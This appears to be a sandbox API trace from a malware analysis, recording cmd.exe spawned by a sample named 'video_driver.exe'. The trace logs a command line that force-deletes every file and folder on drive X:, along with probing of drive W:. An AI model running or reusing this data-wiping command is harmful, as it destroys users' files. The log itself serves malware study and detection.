RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623170 [0065.993] GetProcessHeap () returned 0x610000 [0065.993] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6231d0 [0065.993] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.993] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.994] GetProcessHeap () returned 0x610000 [0065.994] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x6231f0 [0065.994] GetProcessHeap () returned 0x610000 [0065.994] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x6257e0 [0065.994] GetProcessHeap () returned 0x610000 [0065.994] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6257e0, Size=0x14) returned 0x623210 [0065.994] GetProcessHeap () returned 0x610000 [0065.994] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x623210) returned 0x14 [0065.994] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.994] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.994] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.994] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.994] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.995] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.995] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.995] GetProcessHeap () returned 0x610000 [0065.995] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623230 [0065.995] GetProcessHeap () returned 0x610000 [0065.995] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x61ffd8 [0065.995] GetProcessHeap () returned 0x610000 [0065.995] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x623290 [0065.996] GetProcessHeap () returned 0x610000 [0065.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x6232c0 [0065.996] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.997] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.997] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.997] GetProcessHeap () returned 0x610000 [0065.997] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623320 [0065.997] GetProcessHeap () returned 0x610000 [0065.997] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x623380 [0065.997] GetProcessHeap () returned 0x610000 [0065.998] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6233d0 [0065.998] GetProcessHeap () returned 0x610000 [0065.998] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6233d0, Size=0x12) returned 0x6233d0 [0065.998] GetProcessHeap () returned 0x610000 [0065.998] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6233d0) returned 0x12 [0065.998] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.998] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.999] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.999] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.999] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.999] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.999] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.999] GetProcessHeap () returned 0x610000 [0066.000] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x6233f0 [0066.000] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.001] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.001] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.001] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.001] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.001] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.001] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.001] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.001] GetProcessHeap () returned 0x610000 [0066.001] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623410 [0066.001] GetProcessHeap () returned 0x610000 [0066.001] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x623470 [0066.001] GetProcessHeap () returned 0x610000 [0066.001] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x6257e0 [0066.003] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.004] GetFullPathNameW (in: lpFileName="W:", nBufferLength=0x208, lpBuffer=0x32f4a8, lpFilePart=0x32f254 | out: lpBuffer="W:\\", lpFilePart=0x32f254*=0x0) returned 0x3 [0066.005] wcsncmp (_String1="W:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -5 [0066.009] GetFileAttributesW (lpFileName="W:\\" (normalized: "w:")) returned 0xffffffff [0066.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.010] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.010] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.010] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.011] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.011] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.011] SetConsoleInputExeNameW () returned 0x1 [0066.011] GetConsoleOutputCP () returned 0x1b5 [0066.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.012] exit (_Code=0) Process: id = "44" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42d3b000" os_pid = "0xab8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0xbc4 [0066.154] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43fa1c | out: lpSystemTimeAsFileTime=0x43fa1c*(dwLowDateTime=0x53e6740, dwHighDateTime=0x1d62400)) [0066.154] GetCurrentProcessId () returned 0xab8 [0066.154] GetCurrentThreadId () returned 0xbc4 [0066.154] GetTickCount () returned 0x1147f8c [0066.154] QueryPerformanceCounter (in: lpPerformanceCount=0x43fa14 | out: lpPerformanceCount=0x43fa14*=18628765723) returned 1 [0066.156] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.156] __set_app_type (_Type=0x1) [0066.156] __p__fmode () returned 0x770331f4 [0066.156] __p__commode () returned 0x770331fc [0066.157] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.157] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.157] GetCurrentThreadId () returned 0xbc4 [0066.157] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc4) returned 0x60 [0066.157] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.157] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.158] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.158] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43f9ac | out: phkResult=0x43f9ac*=0x0) returned 0x2 [0066.158] VirtualQuery (in: lpAddress=0x43f9e3, lpBuffer=0x43f97c, dwLength=0x1c | out: lpBuffer=0x43f97c*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.158] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43f97c, dwLength=0x1c | out: lpBuffer=0x43f97c*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.158] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43f97c, dwLength=0x1c | out: lpBuffer=0x43f97c*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.159] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43f97c, dwLength=0x1c | out: lpBuffer=0x43f97c*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.159] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43f97c, dwLength=0x1c | out: lpBuffer=0x43f97c*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x180000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.159] GetConsoleOutputCP () returned 0x1b5 [0066.159] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.159] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.159] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.160] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.160] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.160] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.160] GetEnvironmentStringsW () returned 0x7d20f8* [0066.160] GetProcessHeap () returned 0x7c0000 [0066.161] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7d2bd0 [0066.161] FreeEnvironmentStringsW (penv=0x7d20f8) returned 1 [0066.161] GetProcessHeap () returned 0x7c0000 [0066.161] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4) returned 0x7d1898 [0066.161] GetEnvironmentStringsW () returned 0x7d20f8* [0066.161] GetProcessHeap () returned 0x7c0000 [0066.161] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xaca) returned 0x7d36a8 [0066.161] FreeEnvironmentStringsW (penv=0x7d20f8) returned 1 [0066.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e91c | out: phkResult=0x43e91c*=0x68) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x0, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x1, lpcbData=0x43e920*=0x4) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x1, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x0, lpcbData=0x43e920*=0x4) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x40, lpcbData=0x43e920*=0x4) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x40, lpcbData=0x43e920*=0x4) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x40, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.162] RegCloseKey (hKey=0x68) returned 0x0 [0066.162] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e91c | out: phkResult=0x43e91c*=0x68) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x40, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x1, lpcbData=0x43e920*=0x4) returned 0x0 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x1, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x0, lpcbData=0x43e920*=0x4) returned 0x0 [0066.163] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x9, lpcbData=0x43e920*=0x4) returned 0x0 [0066.163] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x4, lpData=0x43e928*=0x9, lpcbData=0x43e920*=0x4) returned 0x0 [0066.163] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e924, lpData=0x43e928, lpcbData=0x43e920*=0x1000 | out: lpType=0x43e924*=0x0, lpData=0x43e928*=0x9, lpcbData=0x43e920*=0x1000) returned 0x2 [0066.163] RegCloseKey (hKey=0x68) returned 0x0 [0066.163] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.163] srand (_Seed=0x5eb34b6c) [0066.163] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q" [0066.163] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"X:\" del /f /s /q \"X:\" & FOR /D %p IN (\"X:\") DO rmdir \"%p\" /s /q" [0066.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.164] GetProcessHeap () returned 0x7c0000 [0066.164] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x210) returned 0x7d20f8 [0066.164] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7d2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.164] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.164] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.164] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.164] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.164] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.164] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.164] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.164] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.164] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.164] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.164] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.164] GetProcessHeap () returned 0x7c0000 [0066.164] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d2bd0 | out: hHeap=0x7c0000) returned 1 [0066.164] GetEnvironmentStringsW () returned 0x7d2310* [0066.165] GetProcessHeap () returned 0x7c0000 [0066.165] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xae2) returned 0x7d4c70 [0066.165] FreeEnvironmentStringsW (penv=0x7d2310) returned 1 [0066.165] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.165] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.165] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.165] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0066.165] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.165] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.165] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.165] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.165] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.165] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.165] GetProcessHeap () returned 0x7c0000 [0066.165] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x54) returned 0x7d17c8 [0066.165] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f6e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43f6e8, lpFilePart=0x43f6e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f6e4*="Desktop") returned 0x25 [0066.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.166] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f464 | out: lpFindFileData=0x43f464*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7d5760 [0066.166] FindClose (in: hFindFile=0x7d5760 | out: hFindFile=0x7d5760) returned 1 [0066.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f464 | out: lpFindFileData=0x43f464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7d5760 [0066.166] FindClose (in: hFindFile=0x7d5760 | out: hFindFile=0x7d5760) returned 1 [0066.166] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f464 | out: lpFindFileData=0x43f464*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7d5760 [0066.166] FindClose (in: hFindFile=0x7d5760 | out: hFindFile=0x7d5760) returned 1 [0066.167] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.167] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.167] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.167] GetProcessHeap () returned 0x7c0000 [0066.167] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d4c70 | out: hHeap=0x7c0000) returned 1 [0066.167] GetEnvironmentStringsW () returned 0x7d4180* [0066.167] GetProcessHeap () returned 0x7c0000 [0066.167] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb36) returned 0x7d5fa0 [0066.167] FreeEnvironmentStringsW (penv=0x7d4180) returned 1 [0066.167] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.167] GetProcessHeap () returned 0x7c0000 [0066.167] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d17c8 | out: hHeap=0x7c0000) returned 1 [0066.167] GetProcessHeap () returned 0x7c0000 [0066.167] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400e) returned 0x7d6ae0 [0066.168] GetProcessHeap () returned 0x7c0000 [0066.168] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xa0) returned 0x7d2e50 [0066.168] GetProcessHeap () returned 0x7c0000 [0066.168] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d6ae0 | out: hHeap=0x7c0000) returned 1 [0066.168] GetConsoleOutputCP () returned 0x1b5 [0066.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.168] GetUserDefaultLCID () returned 0x409 [0066.169] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43f828, cchData=128 | out: lpLCData="0") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43f828, cchData=128 | out: lpLCData="0") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43f828, cchData=128 | out: lpLCData="1") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.188] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.188] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.190] GetProcessHeap () returned 0x7c0000 [0066.190] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x20c) returned 0x7d2ef8 [0066.190] GetConsoleTitleW (in: lpConsoleTitle=0x7d2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.190] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.191] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.191] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.191] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.191] GetProcessHeap () returned 0x7c0000 [0066.191] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x400a) returned 0x7d6ae0 [0066.192] GetProcessHeap () returned 0x7c0000 [0066.192] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4008) returned 0x7daaf8 [0066.192] GetProcessHeap () returned 0x7c0000 [0066.192] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x1a) returned 0x7d57e0 [0066.192] GetEnvironmentVariableW (in: lpName="p IN (\"X", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="CD") returned 13 [0066.192] _wcsicmp (_String1="p IN (\"X", _String2="ERRORLEVEL") returned 11 [0066.192] 